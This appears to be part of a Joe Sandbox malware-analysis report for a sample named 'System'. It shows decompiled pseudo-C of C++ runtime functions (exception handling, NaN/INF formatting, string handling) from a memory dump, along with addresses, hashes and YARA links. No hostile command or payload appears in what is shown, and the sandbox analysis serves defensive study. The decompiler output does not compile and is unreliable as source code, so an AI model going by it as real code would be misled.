                                                                                                                                                              0x7ff6e4c43618
                                                                                                                                                              0x7ff6e4c4361c
                                                                                                                                                              0x7ff6e4c43623
                                                                                                                                                              0x7ff6e4c43629
                                                                                                                                                              0x7ff6e4c43634
                                                                                                                                                              0x7ff6e4c43639
                                                                                                                                                              0x7ff6e4c4363f
                                                                                                                                                              0x7ff6e4c43641
                                                                                                                                                              0x7ff6e4c43644
                                                                                                                                                              0x7ff6e4c4364e
                                                                                                                                                              0x7ff6e4c43654
                                                                                                                                                              0x7ff6e4c4365c
                                                                                                                                                              0x7ff6e4c4366f
                                                                                                                                                              0x7ff6e4c43684
                                                                                                                                                              0x7ff6e4c4368a
                                                                                                                                                              0x7ff6e4c4368f
                                                                                                                                                              0x7ff6e4c43693
                                                                                                                                                              0x7ff6e4c4369b
                                                                                                                                                              0x7ff6e4c4369f
                                                                                                                                                              0x7ff6e4c436a7
                                                                                                                                                              0x7ff6e4c436ba
                                                                                                                                                              0x7ff6e4c436cf
                                                                                                                                                              0x7ff6e4c436d1
                                                                                                                                                              0x7ff6e4c43700

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo_noreturn$ApisFile__std_exception_destroy__std_fs_code_page
                                                                                                                                                              • String ID: ", "$: "
                                                                                                                                                              • API String ID: 2261858363-747220369
                                                                                                                                                              • Opcode ID: 62b77d51fee1077e1d9d1d561448f628a596399e79bd4237f8f93679b3b41e96
                                                                                                                                                              • Instruction ID: 87cb27bbf7c35aacc3c32d163565f9c298877f830b4cc4ba31a0cb423dc629ac
                                                                                                                                                              • Opcode Fuzzy Hash: 62b77d51fee1077e1d9d1d561448f628a596399e79bd4237f8f93679b3b41e96
                                                                                                                                                              • Instruction Fuzzy Hash: FFE1A067B54A8285EB04DF79D1843AC2372EB44FC8F408436DA4D87BA9DF7AD492C349
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C798C4 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 104COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00007FF67FF6E4C798C4(signed int __edx, char* __r8, void* __r9) {
				void* _t3;
				void* _t5;
				signed long long _t9;
				signed long long _t14;
				void* _t17;

				_t18 = _t17 - 0xc0;
				_t9 =  *0xe4ca90a0; // 0x1ae1b17e2973
				 *(_t17 - 0x4f + 0x3f) = _t9 ^ _t17 - 0x000000c0;
				if (__r9 - (__edx & 0x000000ff) + 4 >= 0) goto 0xe4c79910;
				 *__r8 = 0;
				return E00007FF67FF6E4C623B0(_t3, _t5, _t14 ^ _t18);
			}








                                                                                                                                                              0x7ff6e4c798cb
                                                                                                                                                              0x7ff6e4c798d2
                                                                                                                                                              0x7ff6e4c798dc
                                                                                                                                                              0x7ff6e4c798f0
                                                                                                                                                              0x7ff6e4c798f2
                                                                                                                                                              0x7ff6e4c7990f

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                              • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                                                                                              • API String ID: 3215553584-2617248754
                                                                                                                                                              • Opcode ID: dbd02d232e830c6fc1ca1ba8c65caa0aae648e0df9e61b4777ebb11afa26fc27
                                                                                                                                                              • Instruction ID: 8c79ef81fb8e8cb1e39ff3813d319ad567857858d3969bf31d4e5edcf78b6b51
                                                                                                                                                              • Opcode Fuzzy Hash: dbd02d232e830c6fc1ca1ba8c65caa0aae648e0df9e61b4777ebb11afa26fc27
                                                                                                                                                              • Instruction Fuzzy Hash: 92418C36A4AB42DAE700CF34E8803A933B5EB18B98F404136DA4C93B95DE3AD565C349
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C659BC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 313COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 66%
                                                                                                                                                              			E00007FF67FF6E4C659BC(void* __ecx, void* __edx, long long* __rcx, long long __rdx, long long __r8, long long __r9, void* __r10) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				intOrPtr _t138;
				signed char _t147;
				signed char _t148;
				void* _t154;
				void* _t159;
				void* _t188;
				signed long long _t198;
				signed long long _t199;
				void* _t201;
				void* _t203;
				signed int* _t207;
				long long _t213;
				long long _t215;
				long long _t216;
				long long _t218;
				signed long long _t232;
				long long* _t233;
				long long* _t234;
				long long _t242;
				signed long long _t243;
				long long _t246;
				signed long long _t254;
				signed long long _t255;
				long long _t266;
				signed int* _t279;
				long long _t280;
				void* _t281;
				void* _t282;
				signed long long _t283;
				long long _t295;
				signed long long _t304;

				_t156 = __ecx;
				_t281 = _t282 - 0x28;
				_t283 = _t282 - 0x128;
				_t198 =  *0xe4ca90a0; // 0x1ae1b17e2973
				_t199 = _t198 ^ _t283;
				 *(_t281 + 0x10) = _t199;
				_t279 =  *((intOrPtr*)(_t281 + 0x90));
				_t304 =  *((intOrPtr*)(_t281 + 0xa8));
				 *((long long*)(_t283 + 0x68)) = __r8;
				_t233 = __rcx;
				 *((long long*)(_t281 - 0x80)) = __rdx;
				 *(_t281 - 0x68) = _t304;
				 *((char*)(_t283 + 0x60)) = 0;
				_t280 = __r9;
				r14d = E00007FF67FF6E4C67C78(__ecx, __rcx, __rdx, __r9, __r9, _t281, _t279, __r9);
				if (_t199 - 0xffffffff < 0) goto 0xe4c65e7b;
				if (_t199 - _t279[1] >= 0) goto 0xe4c65e7b;
				if ( *_t233 != 0xe06d7363) goto 0xe4c65b07;
				if ( *((long long*)(_t233 + 0x18)) != 4) goto 0xe4c65b07;
				_t201 =  *((intOrPtr*)(_t233 + 0x20)) - 0x19930520;
				if (_t201 - 2 > 0) goto 0xe4c65b07;
				if ( *((long long*)(_t233 + 0x30)) != 0) goto 0xe4c65b07;
				E00007FF67FF6E4C64EF8(_t201);
				if ( *((long long*)(_t201 + 0x20)) == 0) goto 0xe4c65e14;
				E00007FF67FF6E4C64EF8(_t201);
				_t234 =  *((intOrPtr*)(_t201 + 0x20));
				E00007FF67FF6E4C64EF8(_t201);
				 *((char*)(_t283 + 0x60)) = 1;
				 *((long long*)(_t283 + 0x68)) =  *((intOrPtr*)(_t201 + 0x28));
				E00007FF67FF6E4C63E28(_t201,  *((intOrPtr*)(_t234 + 0x38)));
				if ( *_t234 != 0xe06d7363) goto 0xe4c65abf;
				if ( *((long long*)(_t234 + 0x18)) != 4) goto 0xe4c65abf;
				_t203 =  *((intOrPtr*)(_t234 + 0x20)) - 0x19930520;
				if (_t203 - 2 > 0) goto 0xe4c65abf;
				if ( *((long long*)(_t234 + 0x30)) == 0) goto 0xe4c65e7b;
				E00007FF67FF6E4C64EF8(_t203);
				if ( *(_t203 + 0x38) == 0) goto 0xe4c65b07;
				E00007FF67FF6E4C64EF8(_t203);
				E00007FF67FF6E4C64EF8(_t203);
				 *(_t203 + 0x38) =  *(_t203 + 0x38) & 0x00000000;
				if (E00007FF67FF6E4C67D10(_t203, _t234, _t234,  *(_t203 + 0x38), __r9) != 0) goto 0xe4c65b02;
				if (E00007FF67FF6E4C67E00(_t203, _t234,  *(_t203 + 0x38), __r9, _t281) == 0) goto 0xe4c65e58;
				goto 0xe4c65e34;
				 *((long long*)(_t281 - 0x40)) =  *((intOrPtr*)(__r9 + 8));
				 *(_t281 - 0x48) = _t279;
				if ( *_t234 != 0xe06d7363) goto 0xe4c65dcb;
				if ( *((long long*)(_t234 + 0x18)) != 4) goto 0xe4c65dcb;
				if ( *((intOrPtr*)(_t234 + 0x20)) - 0x19930520 - 2 > 0) goto 0xe4c65dcb;
				r13d = 0;
				if (_t279[3] - r13d <= 0) goto 0xe4c65cfc;
				_t207 =  *((intOrPtr*)(_t281 + 0xa0));
				 *(_t283 + 0x28) = _t207;
				 *(_t283 + 0x20) = _t279;
				r8d = r14d;
				E00007FF67FF6E4C636CC(_t234, _t281 - 0x28, _t281 - 0x48, __r9, _t281, __r9, __r10);
				asm("movups xmm0, [ebp-0x28]");
				asm("movdqu [ebp-0x38], xmm0");
				asm("psrldq xmm0, 0x8");
				asm("movd eax, xmm0");
				if (_t207 -  *((intOrPtr*)(_t281 - 0x10)) >= 0) goto 0xe4c65cfc;
				_t295 =  *((intOrPtr*)(_t281 - 0x28));
				r12d =  *((intOrPtr*)(_t281 - 0x30));
				 *((long long*)(_t283 + 0x78)) = _t295;
				_t138 = r12d;
				asm("inc ecx");
				_t242 =  *((intOrPtr*)( *((intOrPtr*)( *( *(_t281 - 0x38)) + 0x10)) + ( *( *(_t281 - 0x38)) +  *( *(_t281 - 0x38)) * 4) * 4 +  *((intOrPtr*)(_t295 + 8)) + 0x10));
				 *((long long*)(_t281 - 0x50)) = _t242;
				asm("movd eax, xmm0");
				asm("movups [ebp-0x60], xmm0");
				if (_t138 - r14d > 0) goto 0xe4c65ceb;
				if (r14d - _t138 > 0) goto 0xe4c65ceb;
				_t266 = _t242 +  *((intOrPtr*)(__r9 + 8));
				 *((long long*)(_t281 - 0x70)) = _t266;
				if (r15d == 0) goto 0xe4c65ce8;
				_t243 = ( *(_t281 - 0x60) >> 0x20) + ( *(_t281 - 0x60) >> 0x20) * 4;
				asm("movups xmm0, [edx+ecx*4]");
				asm("movups [ebp-0x8], xmm0");
				_t59 = _t243 * 4; // 0x48ccccc35f40c483
				_t213 =  *((intOrPtr*)(_t266 + _t59 + 0x10));
				 *((long long*)(_t281 + 8)) = _t213;
				E00007FF67FF6E4C63DFC(_t213);
				_t215 = _t213 + 4 +  *((intOrPtr*)( *((intOrPtr*)(_t234 + 0x30)) + 0xc));
				 *((long long*)(_t283 + 0x70)) = _t215;
				E00007FF67FF6E4C63DFC(_t215);
				_t246 =  *((intOrPtr*)(_t215 +  *((intOrPtr*)( *((intOrPtr*)(_t234 + 0x30)) + 0xc))));
				 *((long long*)(_t283 + 0x64)) = _t246;
				if (_t246 <= 0) goto 0xe4c65c79;
				E00007FF67FF6E4C63DFC(_t215);
				_t216 = _t215 +  *((intOrPtr*)( *((intOrPtr*)(_t283 + 0x70))));
				 *((long long*)(_t281 - 0x78)) = _t216;
				E00007FF67FF6E4C66888(_t159, _t234, _t281 - 8, _t216, _t279, __r9,  *((intOrPtr*)(_t234 + 0x30)));
				if (_t216 != 0) goto 0xe4c65c8a;
				 *((long long*)(_t283 + 0x70)) =  *((long long*)(_t283 + 0x70)) + 4;
				_t218 =  *((intOrPtr*)(_t283 + 0x64)) - 1;
				 *((long long*)(_t283 + 0x64)) = _t218;
				if (_t218 > 0) goto 0xe4c65c3d;
				r13d = r13d + 1;
				if (r13d == r15d) goto 0xe4c65ce3;
				goto 0xe4c65bf6;
				 *((char*)(_t283 + 0x58)) =  *((intOrPtr*)(_t281 + 0x98));
				 *((char*)(_t283 + 0x50)) =  *((intOrPtr*)(_t283 + 0x60));
				 *((long long*)(_t283 + 0x48)) =  *(_t281 - 0x68);
				 *(_t283 + 0x40) =  *((intOrPtr*)(_t281 + 0xa0));
				 *(_t283 + 0x38) = _t281 - 0x60;
				 *(_t283 + 0x30) =  *((intOrPtr*)(_t281 - 0x78));
				 *(_t283 + 0x28) = _t281 - 8;
				 *(_t283 + 0x20) = _t279;
				E00007FF67FF6E4C65814(_t156, _t234, _t234,  *((intOrPtr*)(_t281 - 0x80)),  *((intOrPtr*)(_t283 + 0x68)), _t280);
				r13d = 0;
				r12d = r12d + 1;
				if (r12d -  *((intOrPtr*)(_t281 - 0x10)) < 0) goto 0xe4c65b91;
				if (( *_t279 & 0x1fffffff) - 0x19930521 < 0) goto 0xe4c65e08;
				_t188 = _t279[8] - r13d;
				if (_t188 == 0) goto 0xe4c65d22;
				_t147 = E00007FF67FF6E4C63DE8( *_t279 & 0x1fffffff);
				if (_t188 != 0) goto 0xe4c65d43;
				if ((_t147 & 0x00000001) == 0) goto 0xe4c65e08;
				_t148 = E00007FF67FF6E4C63510(_t147 & 0x00000001, _t279[9] >> 2, _t280, _t279);
				if (_t148 != 0) goto 0xe4c65e08;
				if ((_t148 & 0x00000001) != 0) goto 0xe4c65e5e;
				if (_t279[8] == r13d) goto 0xe4c65d68;
				E00007FF67FF6E4C63DE8(_t279[9] >> 2);
				goto 0xe4c65d6b;
				if (E00007FF67FF6E4C67D10(_t279[8], _t234, _t234, _t304, _t280) != 0) goto 0xe4c65e08;
				_t254 =  *((intOrPtr*)(_t281 - 0x80));
				E00007FF67FF6E4C635DC(_t234, _t254, _t280, _t281, _t279, _t281 - 0x78);
				 *((char*)(_t283 + 0x50)) =  *((intOrPtr*)(_t281 + 0x98));
				_t255 = _t254 | 0xffffffff;
				 *((long long*)(_t283 + 0x48)) = _t280;
				 *(_t283 + 0x40) = _t304;
				 *(_t283 + 0x38) = _t255;
				 *(_t283 + 0x30) = _t255;
				 *(_t283 + 0x28) = _t279;
				 *(_t283 + 0x20) = _t304;
				E00007FF67FF6E4C63974( *((intOrPtr*)(_t281 - 0x80)), _t234,  *((intOrPtr*)(_t283 + 0x68)), _t279[8]);
				goto 0xe4c65e08;
				if (_t279[3] <= 0) goto 0xe4c65e08;
				if ( *((char*)(_t281 + 0x98)) != 0) goto 0xe4c65e7b;
				_t232 =  *((intOrPtr*)(_t281 + 0xa0));
				 *(_t283 + 0x38) = _t304;
				 *(_t283 + 0x30) = _t232;
				 *(_t283 + 0x28) = r14d;
				 *(_t283 + 0x20) = _t279;
				E00007FF67FF6E4C66380(_t234, _t234,  *((intOrPtr*)(_t281 - 0x80)),  *(_t281 - 0x58) >> 0x20, _t280);
				_t154 = E00007FF67FF6E4C64EF8(_t232);
				if ( *((long long*)(_t232 + 0x38)) != 0) goto 0xe4c65e7b;
				return E00007FF67FF6E4C623B0(_t154,  *((intOrPtr*)(_t281 + 0x98)),  *(_t281 + 0x10) ^ _t283);
			}






































                                                                                                                                                              0x7ff6e4c659bc
                                                                                                                                                              0x7ff6e4c659c9
                                                                                                                                                              0x7ff6e4c659ce
                                                                                                                                                              0x7ff6e4c659d5
                                                                                                                                                              0x7ff6e4c659dc
                                                                                                                                                              0x7ff6e4c659df
                                                                                                                                                              0x7ff6e4c659e3
                                                                                                                                                              0x7ff6e4c659ed
                                                                                                                                                              0x7ff6e4c659f7
                                                                                                                                                              0x7ff6e4c659fc
                                                                                                                                                              0x7ff6e4c659ff
                                                                                                                                                              0x7ff6e4c65a09
                                                                                                                                                              0x7ff6e4c65a10
                                                                                                                                                              0x7ff6e4c65a15
                                                                                                                                                              0x7ff6e4c65a1d
                                                                                                                                                              0x7ff6e4c65a23
                                                                                                                                                              0x7ff6e4c65a2c
                                                                                                                                                              0x7ff6e4c65a38
                                                                                                                                                              0x7ff6e4c65a42
                                                                                                                                                              0x7ff6e4c65a4b
                                                                                                                                                              0x7ff6e4c65a53
                                                                                                                                                              0x7ff6e4c65a5e
                                                                                                                                                              0x7ff6e4c65a64
                                                                                                                                                              0x7ff6e4c65a6e
                                                                                                                                                              0x7ff6e4c65a74
                                                                                                                                                              0x7ff6e4c65a79
                                                                                                                                                              0x7ff6e4c65a7d
                                                                                                                                                              0x7ff6e4c65a86
                                                                                                                                                              0x7ff6e4c65a8f
                                                                                                                                                              0x7ff6e4c65a94
                                                                                                                                                              0x7ff6e4c65a9f
                                                                                                                                                              0x7ff6e4c65aa5
                                                                                                                                                              0x7ff6e4c65aaa
                                                                                                                                                              0x7ff6e4c65ab2
                                                                                                                                                              0x7ff6e4c65ab9
                                                                                                                                                              0x7ff6e4c65abf
                                                                                                                                                              0x7ff6e4c65ac9
                                                                                                                                                              0x7ff6e4c65acb
                                                                                                                                                              0x7ff6e4c65ad4
                                                                                                                                                              0x7ff6e4c65adf
                                                                                                                                                              0x7ff6e4c65aeb
                                                                                                                                                              0x7ff6e4c65af7
                                                                                                                                                              0x7ff6e4c65afd
                                                                                                                                                              0x7ff6e4c65b0b
                                                                                                                                                              0x7ff6e4c65b0f
                                                                                                                                                              0x7ff6e4c65b19
                                                                                                                                                              0x7ff6e4c65b23
                                                                                                                                                              0x7ff6e4c65b34
                                                                                                                                                              0x7ff6e4c65b3a
                                                                                                                                                              0x7ff6e4c65b41
                                                                                                                                                              0x7ff6e4c65b47
                                                                                                                                                              0x7ff6e4c65b51
                                                                                                                                                              0x7ff6e4c65b5c
                                                                                                                                                              0x7ff6e4c65b61
                                                                                                                                                              0x7ff6e4c65b64
                                                                                                                                                              0x7ff6e4c65b69
                                                                                                                                                              0x7ff6e4c65b6d
                                                                                                                                                              0x7ff6e4c65b72
                                                                                                                                                              0x7ff6e4c65b77
                                                                                                                                                              0x7ff6e4c65b7e
                                                                                                                                                              0x7ff6e4c65b84
                                                                                                                                                              0x7ff6e4c65b88
                                                                                                                                                              0x7ff6e4c65b8c
                                                                                                                                                              0x7ff6e4c65b9c
                                                                                                                                                              0x7ff6e4c65bab
                                                                                                                                                              0x7ff6e4c65bb0
                                                                                                                                                              0x7ff6e4c65bb5
                                                                                                                                                              0x7ff6e4c65bb8
                                                                                                                                                              0x7ff6e4c65bbc
                                                                                                                                                              0x7ff6e4c65bc3
                                                                                                                                                              0x7ff6e4c65bd4
                                                                                                                                                              0x7ff6e4c65be1
                                                                                                                                                              0x7ff6e4c65be9
                                                                                                                                                              0x7ff6e4c65bf0
                                                                                                                                                              0x7ff6e4c65bf9
                                                                                                                                                              0x7ff6e4c65bfd
                                                                                                                                                              0x7ff6e4c65c01
                                                                                                                                                              0x7ff6e4c65c05
                                                                                                                                                              0x7ff6e4c65c05
                                                                                                                                                              0x7ff6e4c65c09
                                                                                                                                                              0x7ff6e4c65c0c
                                                                                                                                                              0x7ff6e4c65c1d
                                                                                                                                                              0x7ff6e4c65c20
                                                                                                                                                              0x7ff6e4c65c25
                                                                                                                                                              0x7ff6e4c65c32
                                                                                                                                                              0x7ff6e4c65c35
                                                                                                                                                              0x7ff6e4c65c3b
                                                                                                                                                              0x7ff6e4c65c3d
                                                                                                                                                              0x7ff6e4c65c4e
                                                                                                                                                              0x7ff6e4c65c58
                                                                                                                                                              0x7ff6e4c65c5c
                                                                                                                                                              0x7ff6e4c65c63
                                                                                                                                                              0x7ff6e4c65c69
                                                                                                                                                              0x7ff6e4c65c6f
                                                                                                                                                              0x7ff6e4c65c71
                                                                                                                                                              0x7ff6e4c65c77
                                                                                                                                                              0x7ff6e4c65c79
                                                                                                                                                              0x7ff6e4c65c7f
                                                                                                                                                              0x7ff6e4c65c85
                                                                                                                                                              0x7ff6e4c65c9f
                                                                                                                                                              0x7ff6e4c65ca7
                                                                                                                                                              0x7ff6e4c65caf
                                                                                                                                                              0x7ff6e4c65cba
                                                                                                                                                              0x7ff6e4c65cc2
                                                                                                                                                              0x7ff6e4c65ccb
                                                                                                                                                              0x7ff6e4c65cd4
                                                                                                                                                              0x7ff6e4c65cd9
                                                                                                                                                              0x7ff6e4c65cde
                                                                                                                                                              0x7ff6e4c65ce8
                                                                                                                                                              0x7ff6e4c65ceb
                                                                                                                                                              0x7ff6e4c65cf2
                                                                                                                                                              0x7ff6e4c65d08
                                                                                                                                                              0x7ff6e4c65d0e
                                                                                                                                                              0x7ff6e4c65d12
                                                                                                                                                              0x7ff6e4c65d14
                                                                                                                                                              0x7ff6e4c65d20
                                                                                                                                                              0x7ff6e4c65d2a
                                                                                                                                                              0x7ff6e4c65d36
                                                                                                                                                              0x7ff6e4c65d3d
                                                                                                                                                              0x7ff6e4c65d4b
                                                                                                                                                              0x7ff6e4c65d55
                                                                                                                                                              0x7ff6e4c65d57
                                                                                                                                                              0x7ff6e4c65d66
                                                                                                                                                              0x7ff6e4c65d75
                                                                                                                                                              0x7ff6e4c65d85
                                                                                                                                                              0x7ff6e4c65d88
                                                                                                                                                              0x7ff6e4c65d9e
                                                                                                                                                              0x7ff6e4c65da2
                                                                                                                                                              0x7ff6e4c65da5
                                                                                                                                                              0x7ff6e4c65daa
                                                                                                                                                              0x7ff6e4c65daf
                                                                                                                                                              0x7ff6e4c65db3
                                                                                                                                                              0x7ff6e4c65dba
                                                                                                                                                              0x7ff6e4c65dbf
                                                                                                                                                              0x7ff6e4c65dc4
                                                                                                                                                              0x7ff6e4c65dc9
                                                                                                                                                              0x7ff6e4c65dcf
                                                                                                                                                              0x7ff6e4c65dd8
                                                                                                                                                              0x7ff6e4c65dde
                                                                                                                                                              0x7ff6e4c65de7
                                                                                                                                                              0x7ff6e4c65def
                                                                                                                                                              0x7ff6e4c65df6
                                                                                                                                                              0x7ff6e4c65dfe
                                                                                                                                                              0x7ff6e4c65e03
                                                                                                                                                              0x7ff6e4c65e08
                                                                                                                                                              0x7ff6e4c65e12
                                                                                                                                                              0x7ff6e4c65e33

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Frame$BlockEstablisherHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                                              • API String ID: 3606184308-393685449
                                                                                                                                                              • Opcode ID: 0ea5371499c8f85ff252c53ea4b0d7bc46fec06166ad11ee5359a27bcfc01b95
                                                                                                                                                              • Instruction ID: a679c7033bbf1b135604ce0528dfb64c0591f540368142941d430fadcd2d8a2a
                                                                                                                                                              • Opcode Fuzzy Hash: 0ea5371499c8f85ff252c53ea4b0d7bc46fec06166ad11ee5359a27bcfc01b95
                                                                                                                                                              • Instruction Fuzzy Hash: 71D15E3BA587428AEB208B35A4803BD77B4FB45F88F108176DA4D97B95CF39E451C70A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C54270 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 215COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 38%
                                                                                                                                                              			E00007FF67FF6E4C54270(void* __edx, void* __esi, void* __rcx, intOrPtr* __rdx, char* __r8, void* __r9, void* __r11, void* __r12) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* __r14;
				void* _t62;
				void* _t63;
				signed char _t65;
				void* _t69;
				void* _t70;
				signed long long _t96;
				char* _t98;
				char* _t99;
				char* _t100;
				void* _t112;
				void* _t113;
				void* _t118;
				intOrPtr _t149;
				intOrPtr _t152;
				intOrPtr _t155;
				intOrPtr _t161;
				intOrPtr* _t164;
				void* _t166;
				void* _t167;
				void* _t168;
				signed long long _t169;
				void* _t175;
				void* _t178;
				long long _t179;
				void* _t180;

				_t177 = __r12;
				_t175 = __r9;
				_t70 = __edx;
				_t167 = _t168 - 0x130;
				_t169 = _t168 - 0x230;
				_t96 =  *0xe4ca90a0; // 0x1ae1b17e2973
				 *(_t167 + 0x120) = _t96 ^ _t169;
				_t98 = __r8;
				_t164 = __rdx;
				_t166 = __rcx;
				r14d = 0;
				 *((intOrPtr*)(_t169 + 0x20)) = r14d;
				if ( *((intOrPtr*)(__r8 + 0x10)) != _t179) goto 0xe4c542be;
				E00007FF67FF6E4C49E00(__r8, _t118, _t167 + 0x50, __rdx, __rcx);
				_t99 = _t98;
				_t7 = _t179 + 1; // 0x1
				_t65 = _t7;
				goto 0xe4c5431d;
				E00007FF67FF6E4C4FEC0(_t118, _t167 + 0x30, _t99, _t164, 0xe4ca9000, __r12);
				_t100 = _t99;
				 *((long long*)(_t169 + 0x20)) = 2;
				if ( *((long long*)(_t164 + 0x18)) - 0x10 < 0) goto 0xe4c542e7;
				E00007FF67FF6E4C4AB00(_t118, _t100, _t166,  *((intOrPtr*)(_t164 + 0x10)));
				asm("movups xmm0, [eax]");
				asm("movups [ebp+0x70], xmm0");
				asm("movups xmm1, [eax+0x10]");
				asm("movups [ebp+0x80], xmm1");
				 *((long long*)(_t100 + 0x10)) = _t179;
				 *((long long*)(_t100 + 0x18)) = 0xf;
				 *_t100 = 0;
				E00007FF67FF6E4C49E00(_t167 + 0x70, 0xe, _t167 + 0x90, _t167 + 0x70, _t166);
				if ((_t65 & 0x00000004) == 0) goto 0xe4c54378;
				_t149 =  *((intOrPtr*)(_t167 + 0x88));
				if (_t149 - 0x10 < 0) goto 0xe4c54378;
				if (_t149 + 1 - 0x1000 < 0) goto 0xe4c54372;
				if ( *((intOrPtr*)(_t167 + 0x70)) -  *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x70)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c544fd;
				0xe4c623d0();
				if ((_t65 & 0x00000002) == 0) goto 0xe4c543cb;
				_t152 =  *((intOrPtr*)(_t167 + 0x48));
				if (_t152 - 0x10 < 0) goto 0xe4c543bb;
				if (_t152 + 1 - 0x1000 < 0) goto 0xe4c543b6;
				if ( *((intOrPtr*)(_t167 + 0x30)) -  *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x30)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c54503;
				0xe4c623d0();
				 *((long long*)(_t167 + 0x40)) = _t179;
				 *((long long*)(_t167 + 0x48)) = 0xf;
				 *((char*)(_t167 + 0x30)) = 0;
				if ((_t65 & 0x00000001) == 0) goto 0xe4c5441b;
				_t155 =  *((intOrPtr*)(_t167 + 0x68));
				if (_t155 - 0x10 < 0) goto 0xe4c5440b;
				if (_t155 + 1 - 0x1000 < 0) goto 0xe4c54406;
				_t112 =  *((intOrPtr*)(_t167 + 0x50)) -  *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x50)) - 8)) + 0xfffffff8;
				if (_t112 - 0x1f > 0) goto 0xe4c54509;
				0xe4c623d0();
				 *((long long*)(_t167 + 0x60)) = _t179;
				 *((long long*)(_t167 + 0x68)) = 0xf;
				 *((char*)(_t167 + 0x50)) = 0;
				if ( *((long long*)(_t164 + 0x18)) - 0x10 < 0) goto 0xe4c54425;
				r8d = 0;
				E00007FF67FF6E4C567A0( *((intOrPtr*)(_t166 + 8)),  *_t164, _t166,  *((intOrPtr*)(_t164 + 0x10)), _t177, _t178, _t179, _t180);
				if (_t112 != 0) goto 0xe4c54498;
				E00007FF67FF6E4C53230(0x20245c8900000008, _t166, _t167 + 0xb0, __r11);
				_t113 = _t112;
				if ( *((long long*)(_t167 + 0xc0)) != 0) goto 0xe4c54456;
				goto 0xe4c5448a;
				E00007FF67FF6E4C545B0(0, _t69, _t70, _t166, _t167 + 0x90, _t167 + 0xb0, _t175, __r11);
				if (_t113 != 0) goto 0xe4c54485;
				_t62 = E00007FF67FF6E4C56350(_t113,  *((intOrPtr*)(_t166 + 8)), _t166, _t179);
				if (_t113 != 0) goto 0xe4c5450f;
				_t63 = E00007FF67FF6E4C4D800(_t62, _t167 + 0xb0);
				goto 0xe4c5449a;
				_t161 =  *((intOrPtr*)(_t167 + 0xa8));
				if (_t161 - 0x10 < 0) goto 0xe4c544d7;
				if (_t161 + 1 - 0x1000 < 0) goto 0xe4c544d2;
